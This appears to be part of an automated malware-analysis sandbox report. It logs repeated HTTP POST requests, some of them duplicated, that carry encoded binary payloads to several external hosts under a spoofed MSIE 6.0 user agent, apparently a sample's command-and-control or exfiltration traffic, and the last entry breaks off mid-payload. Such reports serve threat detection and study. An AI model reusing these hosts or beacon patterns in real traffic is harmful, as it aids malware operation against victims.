opZXrPEHyNfJ1+m+EGBKq0oB8AAvaEI8te1ZnJhBW3YCreQaRWifNz7J7TvAL4Z5E17WVYsKv8G+Htnm0rxqeU2KLhjd2E6+VPz/WU7rlYJ9qtMmyqqJiMWZd8aMb5cxr2TOQP6XdOt0dmG38MwFJj+pA0O7um3Z3WKny/jga+XnA5AyMOW69VYyqLGCt27+80WDG/EQ6le7/dW0lx3hOnsfbWXMu8A0btfrZqDizT1N57NiC1zo5HzOa17E/eLwPys/IxJMdYHFv5B2qDVzxnvTq9fOJu2P9RRrb9xf5ZkZjvaq2UAEmEOjkXRdSGKKB1J8T0dGmMxYLQWjEesQE1xD2p5nW/wb8tChEjSYWDlZ1ElhMt8Nvzlv9cKMtJZ57eL3SnaRpvfLwxY6VVL4/NXTp6S6D4nv/AtD0fWJnVvRElUfW9B8Yvv5cirYZbFlAUlkMj8nL29Me3As5DK13UM3l92Tyh8KQWfDSABDxD0Vuh2hn8GOvy8U3LUME5KRKo9dQvyw49o1Awkglgm4J6Pfy+G4eUMGghlFddzHjVEQO7+AH8Q0/CE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 36 4f 4e 75 72 51 4d 52 79 4e 64 69 4b 6b 4e 4d 43 67 4b 71 6b 53 78 36 4b 4a 36 70 6b 38 4d 67 35 77 34 50 6b 46 48 78 30 39 58 2f 43 76 75 45 53 41 65 53 35 6c 59 47 65 55 74 38 5a 49 55 70 59 71 52 39 43 71 36 55 61 33 44 49 52 54 75 76 33 31 36 30 4c 55 44 4d 6a 45 34 66 47 72 6d 71 6c 4c 4c 6b 7a 6d 4d 52 63 79 68 31 6d 32 59 37 59 41 34 4e 58 63 57 52 6f 57 61 6b 6a 2b 66 33 49 6a 6b 34 6c 63 52 59 54 55 6a 68 70 2f 30 71 31 4b 64 67 7a 4a 57 52 31 47 43 69 76 46 45 71 73 5a 76 37 4f 70 55 6f 5a 6f 35 57 30 41 52 72 38 71 6b 53 4b 49 74 6b 64 4e 4f 71 6d 75 51 66 2b 4d 76 55 57 4f 30 64 31 72 66 6e 36 75 75 65 74 71 33 65 4a 33 74 58 36 4a 6c 54 32 57 63 65 6f 67 62 44 2b 70 37 6f 39 77 65 77 32 73 6d 41 57 69 61 63 48 36 55 4c 30 74 52 32 4e 73 63 66 7a 77 59 31 48 76 77 63 34 53 35 6b 38 41 52 53 6f 63 71 64 62 73 6b 37 42 61 38 31 2b 4e 71 71 66 6c 56 65 35 4f 65 73 5a 46 50 43 49 65 79 72 32 48 51 39 66 54 32 63 4a 62 4b 30 76 65 2f 37 39 4d 38 57 42 71 56 4a 79 48 2b 79 67 2b 6d 74 44 63 6b 64 39 79 54 73 5a 31 69 65 4c 65 38 76 57 32 49 2b 5a 4c 6c 32 4f 69 44 69 33 50 52 39 39 46 4d 43 6a 76 62 71 2b 4d 63 41 2b 37 43 62 6a 34 4c 58 49 77 77 55 61 79 36 6b 2b 31 70 48 69 47 2f 2b 47 4d 4e 2b 31 36 36 34 42 2f 6e 2b 4a 31 55 33 53 6a 30 38 4b 72 44 4c 66 66 6d 4a 46 73 57 69 6f 53 4f 43 63 44 34 39 64 32 2b 2b 4a 2f 34 6f 64 7a 6b 4c 4e 30 46 36 68 47 4a 66 65 76 77 43 52 59 58 46 71 35 30 7a 66 4f 43 75 44 77 55 38 45 4b 52 42 6c 2f 47 46 79 76 34 4e 6d 2f 35 4c 46 71 55 35 59 58 67 75 6b 46 6b 45 64 52 66 66 34 51 2b 43 58 38 62 54 46 47 56 79 30 5a 5a 4a 2f 68 31 73 Data Ascii: 6ONurQMRyNdiKkNMCgKqkSx6KJ6pk8Mg5w4PkFHx09X/CvuESAeS5lYGeUt8ZIUpYqR9Cq6Ua3DIRTuv3160LUDMjE4fGrmqlLLkzmMRcyh1m2Y7YA4NXcWRoWakj+f3Ijk4lcRYTUjhp/0q1KdgzJWR1GCivFEqsZv7OpUoZo5W0ARr8qkSKItkdNOqmuQf+MvUWO0d1rfn6uuetq3eJ3tX6JlT2WceogbD+p7o9wew2smAWiacH6UL0tR2NscfzwY1Hvwc4S5k8ARSocqdbsk7Ba81+NqqflVe5OesZFPCIeyr2HQ9fT2cJbK0ve/79M8WBqVJyH+yg+mtDckd9yTsZ1ieLe8vW2I+ZLl2OiDi3PR99FMCjvbq+McA+7Cbj4LXIwwUay6k+1pHiG/+GMN+1664B/n+J1U3Sj08KrDLffmJFsWioSOCcD49d2++J/4odzkLN0F6hGJfevwCRYXFq50zfOCuDwU8EKRBl/GFyv4Nm/5LFqU5YXgukFkEdRff4Q+CX8bTFGVy0ZZJ/h1s
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6f 4b 49 71 71 79 7a 2b 78 39 64 33 73 78 6e 42 46 32 4d 6f 73 7a 2f 47 54 69 65 45 39 71 33 48 49 46 70 6c 43 48 51 76 56 38 33 75 57 51 6a 36 74 70 79 33 53 4d 6b 4f 5a 78 44 74 77 69 70 70 43 2f 43 43 52 55 6e 38 69 32 4d 34 54 51 73 63 59 43 33 36 69 56 70 4a 43 37 44 39 68 4c 30 66 78 52 50 42 6a 37 6e 41 32 70 39 34 35 7a 2f 4b 73 6e 64 2b 6a 6d 43 62 67 32 76 46 4e 4d 74 4f 79 46 42 63 47 59 35 2f 38 74 64 45 56 37 4b 58 7a 63 71 6d 6a 5a 69 32 37 61 49 33 48 53 74 74 36 69 31 7a 2b 6b 56 68 77 2f 6c 37 32 59 44 64 59 4e 48 64 74 6e 6a 37 4d 48 4b 77 56 79 33 6f 59 56 63 31 4c 41 30 68 65 46 62 2b 71 39 59 74 51 45 56 75 47 76 39 74 41 2f 4b 41 6c 4f 79 64 4f 71 70 78 68 69 37 55 76 74 59 4f 5a 78 41 69 71 70 76 33 50 54 4d 7a 50 32 79 33 63 66 48 73 4a 73 49 67 2b 52 37 32 5a 31 61 4a 61 49 48 4a 75 41 6b 79 5a 68 30 7a 4d 48 42 33 73 63 76 31 4e 44 48 32 69 48 6c 6b 66 31 44 72 6a 41 54 34 79 71 70 72 68 45 6c 45 75 43 50 50 4a 78 2b 4e 34 31 31 4f 38 59 68 30 64 4c 43 39 4f 39 76 39 34 63 48 31 6b 51 49 7a 71 46 77 37 58 6a 79 4c 6f 61 36 34 66 31 51 67 66 59 68 6f 37 2f 33 36 65 63 30 79 31 34 49 38 4b 6d 66 68 61 51 79 6c 4a 32 6c 43 70 44 55 78 5a 66 46 2b 44 75 35 67 77 32 5a 32 47 61 75 53 52 46 71 42 35 51 4c 68 64 53 52 33 2f 72 46 6c 4b 70 6f 76 55 76 61 46 71 72 59 5a 66 55 38 79 65 62 30 31 57 48 4e 30 44 63 34 6b 35 70 33 4a 38 52 75 4d 41 58 41 52 30 50 69 35 4f 77 6b 47 4e 31 32 56 42 76 37 4e 47 74 5a 4c 72 4b 44 37 77 69 6e 59 64 48 39 43 2b 53 30 4d 4a 72 48 67 5a 61 6e 56 45 42 42 31 43 41 5a 6d 53 55 7a 45 31 34 68 66 43 59 6b 2b 4d 36 49 64 52 66 71 68 7a 4d 77 32 35 2b 39 31 76 69 70 58 6f 59 35 35 56 4e 7a 52 6c 4e 61 71 Data Ascii: oKIqqyz+x9d3sxnBF2Mosz/GTieE9q3HIFplCHQvV83uWQj6tpy3SMkOZxDtwippC/CCRUn8i2M4TQscYC36iVpJC7D9hL0fxRPBj7nA2p945z/Ksnd+jmCbg2vFNMtOyFBcGY5/8tdEV7KXzcqmjZi27aI3HStt6i1z+kVhw/l72YDdYNHdtnj7MHKwVy3oYVc1LA0heFb+q9YtQEVuGv9tA/KAlOydOqpxhi7UvtYOZxAiqpv3PTMzP2y3cfHsJsIg+R72Z1aJaIHJuAkyZh0zMHB3scv1NDH2iHlkf1DrjAT4yqprhElEuCPPJx+N411O8Yh0dLC9O9v94cH1kQIzqFw7XjyLoa64f1QgfYho7/36ec0y14I8KmfhaQylJ2lCpDUxZfF+Du5gw2Z2GauSRFqB5QLhdSR3/rFlKpovUvaFqrYZfU8yeb01WHN0Dc4k5p3J8RuMAXAR0Pi5OwkGN12VBv7NGtZLrKD7winYdH9C+S0MJrHgZanVEBB1CAZmSUzE14hfCYk+M6IdRfqhzMw25+91vipXoY55VNzRlNaq
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 67 4a 4b 74 71 63 76 78 78 39 64 50 43 58 7a 48 49 68 7a 41 65 44 53 2b 6d 37 59 52 79 49 48 77 4c 39 42 61 75 6e 58 43 39 6c 30 46 78 5a 64 2f 5a 68 53 32 50 4e 70 56 39 37 32 71 56 75 4d 58 56 71 58 71 4a 71 71 69 66 4d 44 59 78 35 4c 54 6d 6a 79 30 48 52 35 66 70 6f 56 63 33 77 53 53 63 49 65 39 55 68 34 74 73 38 41 75 4f 76 65 6e 38 67 51 50 4a 31 48 56 38 44 58 70 47 55 55 39 32 34 58 4f 67 49 44 47 70 43 62 33 77 2f 78 7a 54 43 4f 53 6f 75 46 5a 38 2f 7a 69 64 70 7a 75 54 43 36 6c 58 4f 35 46 39 4d 4e 51 59 75 43 68 62 59 4c 31 6c 78 68 65 43 6a 36 75 4e 77 54 64 6d 47 36 44 4d 4c 38 61 4f 30 38 59 41 49 4e 71 50 34 7a 56 53 4b 4a 54 2b 47 59 59 4a 73 39 7a 79 34 50 64 43 30 57 74 33 7a 61 58 79 53 61 47 6e 4f 78 2b 5a 30 67 37 69 30 56 46 50 41 68 72 57 2b 59 59 74 5a 65 4e 73 4d 74 62 65 6d 4c 74 57 34 4d 35 37 37 4d 6c 71 75 65 4c 6a 31 6b 32 54 42 43 72 62 41 31 75 41 49 4e 2b 4f 4c 50 62 59 63 7a 4c 4a 63 78 6e 54 41 44 2f 6e 52 69 53 45 34 74 42 6c 4b 56 79 6f 61 31 36 45 36 54 57 62 7a 6b 67 69 36 6c 6c 53 4a 44 59 48 44 42 4e 4b 32 4f 75 42 48 6e 6a 45 5a 4f 63 44 65 67 73 61 53 34 57 73 50 35 30 51 46 39 57 73 56 71 4d 57 77 45 70 45 61 6e 73 61 33 52 74 50 49 35 4e 6b 49 62 36 63 6f 49 66 69 74 34 43 4f 73 6a 4c 59 64 59 61 62 4a 34 35 66 37 69 46 58 37 35 66 6d 71 4c 2f 75 58 56 78 4c 51 74 6c 44 4f 49 48 35 50 49 4d 4b 51 79 45 77 73 51 6f 62 48 7a 56 63 48 31 54 49 47 78 55 7a 61 6a 51 56 57 78 67 53 64 72 62 42 55 54 61 66 46 69 42 50 59 67 58 30 38 46 39 4e 64 44 72 42 48 79 78 67 4f 53 6c 54 43 6c 44 59 6c 45 42 41 38 57 38 34 2f 57 2b 4f 71 44 4a 38 4e 36 56 36 4d 61 34 74 38 45 44 51 74 55 67 51 71 36 63 61 31 54 64 52 79 66 37 39 36 30 34 7a 62 36 51 39 47 65 43 59 49 61 46 66 63 77 59 Data Ascii: gJKtqcvxx9dPCXzHIhzAeDS+m7YRyIHwL9BaunXC9l0FxZd/ZhS2PNpV972qVuMXVqXqJqqifMDYx5LTmjy0HR5fpoVc3wSScIe9Uh4ts8AuOven8gQPJ1HV8DXpGUU924XOgIDGpCb3w/xzTCOSouFZ8/zidpzuTC6lXO5F9MNQYuChbYL1lxheCj6uNwTdmG6DML8aO08YAINqP4zVSKJT+GYYJs9zy4PdC0Wt3zaXySaGnOx+Z0g7i0VFPAhrW+YYtZeNsMtbemLtW4M577MlqueLj1k2TBCrbA1uAIN+OLPbYczLJcxnTAD/nRiSE4tBlKVyoa16E6TWbzkgi6llSJDYHDBNK2OuBHnjEZOcDegsaS4WsP50QF9WsVqMWwEpEansa3RtPI5NkIb6coIfit4COsjLYdYabJ45f7iFX75fmqL/uXVxLQtlDOIH5PIMKQyEwsQobHzVcH1TIGxUzajQVWxgSdrbBUTafFiBPYgX08F9NdDrBHyxgOSlTClDYlEBA8W84/W+OqDJ8N6V6Ma4t8EDQtUgQq6ca1TdRyf79604zb6Q9GeCYIaFfcwY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 48 4c 37 4c 79 6d 67 55 73 4e 63 46 43 68 7a 32 4b 32 79 70 56 74 73 44 6f 38 42 77 6a 37 77 6c 48 42 35 47 42 57 47 47 4e 57 6a 78 37 76 57 49 2b 53 67 37 67 33 4a 64 43 2f 55 2b 45 51 4e 68 58 58 4e 43 75 75 53 50 66 54 56 2b 59 46 39 46 39 43 56 7a 35 33 7a 41 2b 6d 30 4b 4b 56 73 43 4b 38 55 2f 47 74 37 71 58 6f 4a 4f 58 51 44 50 37 70 65 58 6a 69 57 45 76 7a 51 31 7a 47 53 6b 61 34 64 55 70 49 6e 4e 33 78 69 42 4c 53 70 6d 6b 78 6b 35 61 62 71 78 49 4a 35 6c 67 63 53 66 70 73 72 65 63 7a 74 55 58 73 38 71 39 4a 31 68 42 69 4b 43 2b 2b 61 38 34 76 4a 69 45 63 75 63 41 4b 5a 56 2b 35 61 77 45 6b 52 6e 51 43 4f 61 65 67 69 4b 4c 35 38 38 65 52 78 6a 72 38 6d 71 6b 51 70 74 2b 61 45 4a 77 59 30 41 72 6f 63 77 53 47 75 4d 2b 64 6e 69 48 37 34 4a 2b 4f 37 65 6b 63 5a 51 30 41 38 47 43 72 55 53 4a 74 4c 62 50 62 34 4d 4b 6c 32 4f 34 67 64 6c 47 44 58 74 70 5a 46 5a 53 76 55 39 52 39 6d 72 6e 49 52 33 47 4a 73 78 2b 6a 30 48 54 44 6d 32 73 6c 70 76 79 39 65 61 4d 53 64 65 79 5a 63 75 41 54 4c 4d 59 52 48 43 55 4d 6f 4e 39 52 54 5a 38 53 73 61 70 76 73 52 70 78 4c 30 57 75 76 51 78 65 36 44 67 50 66 6d 75 4b 43 6e 30 45 54 5a 75 4d 79 6c 79 70 44 73 4e 4a 4d 62 39 78 32 63 6e 5a 6a 49 76 31 78 52 48 73 75 49 32 45 70 30 74 48 71 72 69 78 55 64 62 44 64 68 70 4d 44 4f 7a 48 59 38 45 61 2b 2f 35 53 4e 55 6a 53 67 34 6a 4b 45 7a 66 58 61 72 33 33 6f 62 50 32 6d 41 4e 63 62 30 72 49 6f 30 2f 42 41 43 73 75 7a 73 54 4e 61 76 48 4f 69 73 54 47 52 71 4b 56 46 52 4a 49 42 76 71 74 51 71 49 54 7a 64 4d 6a 35 6d 58 70 4a 44 7a 43 4e 33 6c 56 50 64 42 31 68 77 73 77 7a 79 53 57 65 69 55 6b 31 77 65 6d 42 57 51 33 6c 63 31 5a 66 45 44 46 63 38 6d 31 34 2b 43 51 31 63 68 39 4b 30 78 38 7a 77 42 46 45 39 75 49 4a 41 71 6a 54 31 36 4a 66 50 62 50 54 6a 49 73 2f 62 34 4e 63 3d Data Ascii: HL7LymgUsNcFChz2K2ypVtsDo8Bwj7wlHB5GBWGGNWjx7vWI+Sg7g3JdC/U+EQNhXXNCuuSPfTV+YF9F9CVz53zA+m0KKVsCK8U/Gt7qXoJOXQDP7peXjiWEvzQ1zGSka4dUpInN3xiBLSpmkxk5abqxIJ5lgcSfpsrecztUXs8q9J1hBiKC++a84vJiEcucAKZV+5awEkRnQCOaegiKL588eRxjr8mqkQpt+aEJwY0ArocwSGuM+dniH74J+O7ekcZQ0A8GCrUSJtLbPb4MKl2O4gdlGDXtpZFZSvU9R9mrnIR3GJsx+j0HTDm2slpvy9eaMSdeyZcuATLMYRHCUMoN9RTZ8SsapvsRpxL0WuvQxe6DgPfmuKCn0ETZuMylypDsNJMb9x2cnZjIv1xRHsuI2Ep0tHqrixUdbDdhpMDOzHY8Ea+/5SNUjSg4jKEzfXar33obP2mANcb0rIo0/BACsuzsTNavHOisTGRqKVFRJIBvqtQqITzdMj5mXpJDzCN3lVPdB1hwswzySWeiUk1wemBWQ3lc1ZfEDFc8m14+CQ1ch9K0x8zwBFE9uIJAqjT16JfPbPTjIs/b4Nc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 36 4f 4e 75 72 51 4d 52 79 4e 64 69 4b 6b 4e 4d 43 67 4b 71 6b 53 78 36 4b 4a 36 70 6b 38 4d 67 35 77 34 50 6b 46 48 78 30 39 58 2f 43 76 75 45 53 41 65 53 35 6c 59 47 65 55 74 38 5a 49 55 70 59 71 52 39 43 71 36 55 61 33 44 49 52 54 75 76 33 31 36 30 4c 55 44 4d 6a 45 34 66 47 72 6d 71 6c 4c 4c 6b 7a 6d 4d 52 63 79 68 31 6d 32 59 37 59 41 34 4e 58 63 57 52 6f 57 61 6b 6a 2b 66 33 49 6a 6b 34 6c 63 52 59 54 55 6a 68 70 2f 30 71 31 4b 64 67 7a 4a 57 52 31 47 43 69 76 46 45 71 73 5a 76 37 4f 70 55 6f 5a 6f 35 57 30 41 52 72 38 71 6b 53 4b 49 74 6b 64 4e 4f 71 6d 75 51 66 2b 4d 76 55 57 4f 30 64 31 72 66 6e 36 75 75 65 74 71 33 65 4a 33 74 58 36 4a 6c 54 32 57 63 65 6f 67 62 44 2b 70 37 6f 39 77 65 77 32 73 6d 41 57 69 61 63 48 36 55 4c 30 74 52 32 4e 73 63 66 7a 77 59 31 48 76 77 63 34 53 35 6b 38 41 52 53 6f 63 71 64 62 73 6b 37 42 61 38 31 2b 4e 71 71 66 6c 56 65 35 4f 65 73 5a 46 50 43 49 65 79 72 32 48 51 39 66 54 32 63 4a 62 4b 30 76 65 2f 37 39 4d 38 57 42 71 56 4a 79 48 2b 79 67 2b 6d 74 44 63 6b 64 39 79 54 73 5a 31 69 65 4c 65 38 76 57 32 49 2b 5a 4c 6c 32 4f 69 44 69 33 50 52 39 39 46 4d 43 6a 76 62 71 2b 4d 63 41 2b 37 43 62 6a 34 4c 58 49 77 77 55 61 79 36 6b 2b 31 70 48 69 47 2f 2b 47 4d 4e 2b 31 36 36 34 42 2f 6e 2b 4a 31 55 33 53 6a 30 38 4b 72 44 4c 66 66 6d 4a 46 73 57 69 6f 53 4f 43 63 44 34 39 64 32 2b 2b 4a 2f 34 6f 64 7a 6b 4c 4e 30 46 36 68 47 4a 66 65 76 77 43 52 59 58 46 71 35 30 7a 66 4f 43 75 44 77 55 38 45 4b 52 42 6c 2f 47 46 79 76 34 4e 6d 2f 35 4c 46 71 55 35 59 58 67 75 6b 46 6b 45 64 52 66 66 34 51 2b 43 58 38 62 54 46 47 56 79 30 5a 5a 4a 2f 68 31 73 Data Ascii: 6ONurQMRyNdiKkNMCgKqkSx6KJ6pk8Mg5w4PkFHx09X/CvuESAeS5lYGeUt8ZIUpYqR9Cq6Ua3DIRTuv3160LUDMjE4fGrmqlLLkzmMRcyh1m2Y7YA4NXcWRoWakj+f3Ijk4lcRYTUjhp/0q1KdgzJWR1GCivFEqsZv7OpUoZo5W0ARr8qkSKItkdNOqmuQf+MvUWO0d1rfn6uuetq3eJ3tX6JlT2WceogbD+p7o9wew2smAWiacH6UL0tR2NscfzwY1Hvwc4S5k8ARSocqdbsk7Ba81+NqqflVe5OesZFPCIeyr2HQ9fT2cJbK0ve/79M8WBqVJyH+yg+mtDckd9yTsZ1ieLe8vW2I+ZLl2OiDi3PR99FMCjvbq+McA+7Cbj4LXIwwUay6k+1pHiG/+GMN+1664B/n+J1U3Sj08KrDLffmJFsWioSOCcD49d2++J/4odzkLN0F6hGJfevwCRYXFq50zfOCuDwU8EKRBl/GFyv4Nm/5LFqU5YXgukFkEdRff4Q+CX8bTFGVy0ZZJ/h1s
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6f 4b 49 71 71 79 7a 2b 78 39 64 33 73 78 6e 42 46 32 4d 6f 73 7a 2f 47 54 69 65 45 39 71 33 48 49 46 70 6c 43 48 51 76 56 38 33 75 57 51 6a 36 74 70 79 33 53 4d 6b 4f 5a 78 44 74 77 69 70 70 43 2f 43 43 52 55 6e 38 69 32 4d 34 54 51 73 63 59 43 33 36 69 56 70 4a 43 37 44 39 68 4c 30 66 78 52 50 42 6a 37 6e 41 32 70 39 34 35 7a 2f 4b 73 6e 64 2b 6a 6d 43 62 67 32 76 46 4e 4d 74 4f 79 46 42 63 47 59 35 2f 38 74 64 45 56 37 4b 58 7a 63 71 6d 6a 5a 69 32 37 61 49 33 48 53 74 74 36 69 31 7a 2b 6b 56 68 77 2f 6c 37 32 59 44 64 59 4e 48 64 74 6e 6a 37 4d 48 4b 77 56 79 33 6f 59 56 63 31 4c 41 30 68 65 46 62 2b 71 39 59 74 51 45 56 75 47 76 39 74 41 2f 4b 41 6c 4f 79 64 4f 71 70 78 68 69 37 55 76 74 59 4f 5a 78 41 69 71 70 76 33 50 54 4d 7a 50 32 79 33 63 66 48 73 4a 73 49 67 2b 52 37 32 5a 31 61 4a 61 49 48 4a 75 41 6b 79 5a 68 30 7a 4d 48 42 33 73 63 76 31 4e 44 48 32 69 48 6c 6b 66 31 44 72 6a 41 54 34 79 71 70 72 68 45 6c 45 75 43 50 50 4a 78 2b 4e 34 31 31 4f 38 59 68 30 64 4c 43 39 4f 39 76 39 34 63 48 31 6b 51 49 7a 71 46 77 37 58 6a 79 4c 6f 61 36 34 66 31 51 67 66 59 68 6f 37 2f 33 36 65 63 30 79 31 34 49 38 4b 6d 66 68 61 51 79 6c 4a 32 6c 43 70 44 55 78 5a 66 46 2b 44 75 35 67 77 32 5a 32 47 61 75 53 52 46 71 42 35 51 4c 68 64 53 52 33 2f 72 46 6c 4b 70 6f 76 55 76 61 46 71 72 59 5a 66 55 38 79 65 62 30 31 57 48 4e 30 44 63 34 6b 35 70 33 4a 38 52 75 4d 41 58 41 52 30 50 69 35 4f 77 6b 47 4e 31 32 56 42 76 37 4e 47 74 5a 4c 72 4b 44 37 77 69 6e 59 64 48 39 43 2b 53 30 4d 4a 72 48 67 5a 61 6e 56 45 42 42 31 43 41 5a 6d 53 55 7a 45 31 34 68 66 43 59 6b 2b 4d 36 49 64 52 66 71 68 7a 4d 77 32 35 2b 39 31 76 69 70 58 6f 59 35 35 56 4e 7a 52 6c 4e 61 71 Data Ascii: oKIqqyz+x9d3sxnBF2Mosz/GTieE9q3HIFplCHQvV83uWQj6tpy3SMkOZxDtwippC/CCRUn8i2M4TQscYC36iVpJC7D9hL0fxRPBj7nA2p945z/Ksnd+jmCbg2vFNMtOyFBcGY5/8tdEV7KXzcqmjZi27aI3HStt6i1z+kVhw/l72YDdYNHdtnj7MHKwVy3oYVc1LA0heFb+q9YtQEVuGv9tA/KAlOydOqpxhi7UvtYOZxAiqpv3PTMzP2y3cfHsJsIg+R72Z1aJaIHJuAkyZh0zMHB3scv1NDH2iHlkf1DrjAT4yqprhElEuCPPJx+N411O8Yh0dLC9O9v94cH1kQIzqFw7XjyLoa64f1QgfYho7/36ec0y14I8KmfhaQylJ2lCpDUxZfF+Du5gw2Z2GauSRFqB5QLhdSR3/rFlKpovUvaFqrYZfU8yeb01WHN0Dc4k5p3J8RuMAXAR0Pi5OwkGN12VBv7NGtZLrKD7winYdH9C+S0MJrHgZanVEBB1CAZmSUzE14hfCYk+M6IdRfqhzMw25+91vipXoY55VNzRlNaq
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 56 2f 32 52 57 2f 6a 48 74 4e 64 66 4a 78 53 79 65 2b 71 42 76 2b 74 4a 78 61 74 41 59 6f 33 37 72 50 6f 48 4e 66 55 65 73 55 6e 43 78 42 76 43 55 6d 35 38 70 59 71 68 73 65 38 6d 36 31 51 49 72 37 47 4c 47 31 51 79 52 6f 32 4b 66 79 4b 4a 38 76 4c 75 67 4e 4b 43 46 37 33 50 42 2f 64 4b 61 6f 42 41 73 65 51 73 44 2f 44 56 4e 6c 78 69 42 4d 79 32 68 4b 75 59 58 37 6a 74 71 37 49 79 33 31 69 7a 6b 74 7a 4c 67 33 30 67 38 67 6a 6d 4b 39 47 4f 43 35 4e 6e 38 44 55 37 39 42 6e 4b 63 35 2b 69 72 73 56 75 61 67 6f 37 37 6d 31 6f 2f 4b 76 6e 58 2b 55 39 39 42 57 54 2b 64 54 76 4d 67 32 6d 58 76 6e 72 72 4a 38 2f 34 5a 36 34 2b 66 4a 62 5a 78 30 55 54 47 4a 54 6b 4b 4f 6d 6f 4d 4f 47 55 46 48 33 36 75 58 41 31 46 71 44 43 5a 78 71 39 6c 76 6d 4e 52 71 43 4d 6e 67 6e 49 76 43 37 6f 32 31 70 4e 53 4a 6d 50 6b 50 59 2b 59 31 67 71 52 31 6f 69 41 6e 6b 32 68 59 64 4d 73 57 57 76 31 38 43 4f 56 38 42 5a 74 71 57 78 66 6f 52 39 6e 32 42 46 4c 2b 5a 48 39 33 69 41 4a 4c 41 4d 51 68 37 43 6f 45 38 36 47 34 37 45 68 51 53 64 49 50 37 59 6d 68 6c 49 4a 74 68 32 4d 67 6d 56 69 6d 4a 2b 56 76 61 50 32 6a 7a 55 64 48 71 38 47 70 6c 78 67 68 73 79 65 63 36 6b 36 69 57 45 6b 77 43 78 4d 52 61 73 6a 56 6b 41 4c 2f 39 43 38 44 56 41 4c 39 4d 6d 42 46 34 6f 65 71 74 62 4f 79 50 4a 4b 48 75 4a 58 65 47 39 4d 68 52 58 79 72 32 6f 54 54 76 50 46 31 42 55 43 6b 43 43 57 50 6a 73 46 55 2f 55 2f 58 57 38 45 55 6a 36 64 73 4c 71 4d 72 6d 67 32 7a 34 78 64 78 37 68 32 49 51 46 58 65 58 4d 65 42 45 36 6b 49 7a 54 78 32 4e 6e 74 35 5a 36 49 4c 39 7a 63 4f 4a 32 53 69 73 49 71 2b 33 76 35 4c 74 6c 51 59 37 63 77 66 79 54 79 47 6d 46 6d 61 4b 74 33 4b 35 63 42 34 32 33 63 4f 4c 77 53 7a 32 4c 58 46 55 6e 72 75 72 64 50 30 58 7a 61 35 30 32 33 63 3d Data Ascii: V/2RW/jHtNdfJxSye+qBv+tJxatAYo37rPoHNfUesUnCxBvCUm58pYqhse8m61QIr7GLG1QyRo2KfyKJ8vLugNKCF73PB/dKaoBAseQsD/DVNlxiBMy2hKuYX7jtq7Iy31izktzLg30g8gjmK9GOC5Nn8DU79BnKc5+irsVuago77m1o/KvnX+U99BWT+dTvMg2mXvnrrJ8/4Z64+fJbZx0UTGJTkKOmoMOGUFH36uXA1FqDCZxq9lvmNRqCMngnIvC7o21pNSJmPkPY+Y1gqR1oiAnk2hYdMsWWv18COV8BZtqWxfoR9n2BFL+ZH93iAJLAMQh7CoE86G47EhQSdIP7YmhlIJth2MgmVimJ+VvaP2jzUdHq8Gplxghsyec6k6iWEkwCxMRasjVkAL/9C8DVAL9MmBF4oeqtbOyPJKHuJXeG9MhRXyr2oTTvPF1BUCkCCWPjsFU/U/XW8EUj6dsLqMrmg2z4xdx7h2IQFXeXMeBE6kIzTx2Nnt5Z6IL9zcOJ2SisIq+3v5LtlQY7cwfyTyGmFmaKt3K5cB423cOLwSz2LXFUnrurdP0Xza5023c=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 63 4f 34 35 72 70 34 58 79 4e 65 74 71 65 44 78 36 52 70 76 4f 59 47 4b 64 50 2f 65 69 54 7a 34 73 75 46 4d 4b 42 42 36 31 30 55 51 58 2b 64 78 37 78 47 6c 62 2f 78 6f 45 42 46 52 50 76 2b 45 71 68 4b 69 6a 61 53 61 2f 43 66 77 61 48 66 38 6e 2b 37 68 34 34 76 57 4e 67 69 54 44 38 58 79 74 48 4b 2b 75 4c 56 48 43 73 6f 50 66 6d 4f 4e 58 4d 53 74 78 55 67 44 54 50 4b 66 4e 6b 4c 61 5a 53 43 4e 36 43 2f 30 7a 47 79 65 72 74 57 6b 45 5a 68 71 68 35 35 6c 50 70 2b 34 45 73 45 44 39 6d 6b 47 62 64 42 79 6b 39 36 41 2f 34 6f 54 49 47 65 72 42 65 2b 6d 56 64 61 6f 78 57 6e 36 38 63 55 49 45 50 35 7a 68 79 76 6c 30 78 71 31 4c 48 57 35 51 6a 44 4c 43 58 44 4e 31 76 35 79 47 53 53 30 70 33 31 65 62 54 2f 49 46 37 77 71 72 72 4c 69 59 53 73 49 35 66 47 6b 4f 74 62 45 69 43 65 67 47 4c 75 45 53 30 53 68 6a 42 6f 4e 58 65 50 2f 41 71 55 4f 57 2b 